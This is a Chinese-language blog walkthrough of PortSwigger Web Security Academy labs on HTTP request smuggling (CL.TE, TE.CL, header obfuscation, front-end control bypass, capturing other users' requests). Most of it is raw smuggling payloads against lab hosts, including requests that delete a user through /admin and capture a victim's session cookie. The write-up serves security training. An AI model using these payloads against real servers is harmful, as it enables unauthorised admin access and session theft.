All labs | Web Security Academy (portswigger.net)

HTTP request smuggling

1. HTTP request smuggling, basic CL.TE vulnerability

HTTP 请求走私,基本的 CL.TE 漏洞

  • 当 Content-Length 和 Transfer-Encoding 同时出现时,客户端应该遵循 Transfer-Encoding 的规则,而忽略 Content-Length,因为 Transfer-Encoding 机制会将消息体进行拆分

  • 这关主要是通过更改 Content-Length 的值,发送带有 Transfer-Encoding 头部的正文来达到欺骗服务器的目的

1
2
3
4
5
6
7
8
9
10
POST / HTTP/1.1
Host: 0a06001d03118aa0c4626eb800680067.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

230227PM03_81

2. HTTP request smuggling, basic TE.CL vulnerability

HTTP 请求走私,基本的 TE.CL 漏洞

  • 和第一关的区别是,这一关更改 Transfer-Encoding 的值,然后通过发送带有 Content-Length 的正文来欺骗服务器

  • 声明了 Content-length 为 4,但随后使用了 Transfer-Encoding: chunked,这意味着请求体被分成多个部分(即块),每个块都包含一个十六进制的数字,表示该块的大小。第一个块的大小为 5c(十六进制,等于 92),所以后面的块包含了 92 个字符。

  • 但是由于存在 TE.CL 漏洞,**服务器会忽略 Content-length,因此不会将前面的 4 个字符视为请求体的一部分。**相反,服务器会将第一个块的大小视为整个请求体的大小,从而导致攻击者可以向服务器发送包含恶意内容的块,这些内容被认为是请求体的一部分,但实际上并不包含在 Content-length 中声明的大小范围内。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST / HTTP/1.1
Host: 0a83009b049ca08ec342d8a2002f0070.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
	
x=1
0


230227PM05_83

230227PM05_85

230227PM05_84

3. HTTP request smuggling, obfuscating the TE header

HTTP 请求走私,混淆 TE 标头

  • 在请求中添加多个 Transfer-Encoding 头部来混淆或欺骗服务器。在这关中出现了两个 Transfer-Encoding 字段,一个值为 “chunked”,另一个值为 “cow”。
  • 请求体的内容是经过编码的,其中包括了一个 GPOST 请求以及一个包含参数 x=1 的请求体
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP/1.1
Host: 0a5200a4048704c8c3857a68009c004f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

230228AM09_88

4. HTTP request smuggling, confirming a CL.TE vulnerability via differential responses

HTTP 请求走私,通过差异响应确认 CL.TE 漏洞

  • 第一个请求使用了 Transfer-Encoding: chunked 标头来指示请求体的长度为分块编码形式,并设置长度为0,表示请求体为空。
  • 第二个请求使用了 Content-Length 标头来指示请求体的长度为35个字节。
  • 这两个请求放在了一起,会解析出两个不同的请求,其中第一个请求不包含请求体,而第二个请求包含了一个长度为35个字节的请求体。
1
2
3
4
5
6
7
8
9
10
POST / HTTP/1.1
Host: 0a6800d904fae8a2c5f918c700250023.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X

230228AM10_89

5. HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

HTTP 请求走私,通过差异响应确认 TE.CL 漏洞

  • 第一个请求的数据块长度为 0x5e,即 94,后面跟着一个 POST 请求,其请求体为 x=1。
  • 第二个请求的数据块长度为 0,表示这是最后一个数据块。
1
2
3
4
5
6
7
8
9
10
11
12
13
POST / HTTP/1.1
Host: 0a7b005103ea6bc6c04abe7a0021006d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

230228AM10_90

230228AM10_91

6. Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability

利用HTTP请求走私绕过前端安全控制,CL.TE漏洞

1
2
3
4
5
6
7
8
9
10
POST / HTTP/1.1
Host: 0a51005204ee4262c4d91635002400a6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
X-Ignore: X

本地用户localhost放入后,Host标头又冲突了

1
2
3
4
5
6
7
8
9
10
11
POST / HTTP/1.1
Host: 0a51005204ee4262c4d91635002400a6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
X-Ignore: X

将第二段请求,改为正常的请求包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP/1.1
Host: 0a51005204ee4262c4d91635002400a6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=

删除用户: carlos

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP/1.1
Host: 0a51005204ee4262c4d91635002400a6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=

230228AM11_92

230228AM11_93

230228AM11_94

7. Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

利用 HTTP 请求走私绕过前端安全控制,TE.CL 漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP/1.1
Host: 0ad7006803f46b57c050ebab00be0094.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST / HTTP/1.1
Host: 0ad7006803f46b57c050ebab00be0094.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


删除用户carlos

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST / HTTP/1.1
Host: 0ad7006803f46b57c050ebab00be0094.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


230228AM11_96

230228PM12_97

230228PM12_98

8. Exploiting HTTP request smuggling to reveal front-end request rewriting

利用 HTTP 请求走私来揭示前端请求重写

观察搜索功能看它是否反映了参数值search

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP/1.1
Host: 0a4c00e3048d07c6c2e4396b00320006.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close

search=test

第一次请求标头的名称,用它来访问管理面板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST / HTTP/1.1
Host: 0a4c00e3048d07c6c2e4396b00320006.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
X-OhZACS-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close

x=1

更改走私的请求 URL 以删除用户carlos

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST / HTTP/1.1
Host: 0a4c00e3048d07c6c2e4396b00320006.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
X-OhZACS-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close

x=1

230228PM04_99

230228PM04_100

230228PM04_101

9. Exploiting HTTP request smuggling to capture other users’ requests

利用 HTTP 请求走私来捕获其他用户的请求

  1. 访问博客文章并发表评论,抓包请求
  2. 需要慢慢增加走私请求中 Content-Length 标头的值,直到捕获整个 cooki
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP/1.1
Host: 0a5f00f5030f2821c174b72d00c100e3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 600
Cookie: session=enYe7PbIpOv50lcgDeOWdEO3Ymf6m7dq

csrf=XsZYgcHX6NuQAkteJIBenpeAfd8nNMiY&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=comment+2

10. Exploiting HTTP request smuggling to deliver reflected XSS

利用 HTTP 请求走私来传递反射 XSS

评论

© Rabbit 使用 Stellar 创建

✨ 营业:

共发表 56 篇Blog 🔸 总计 123.6k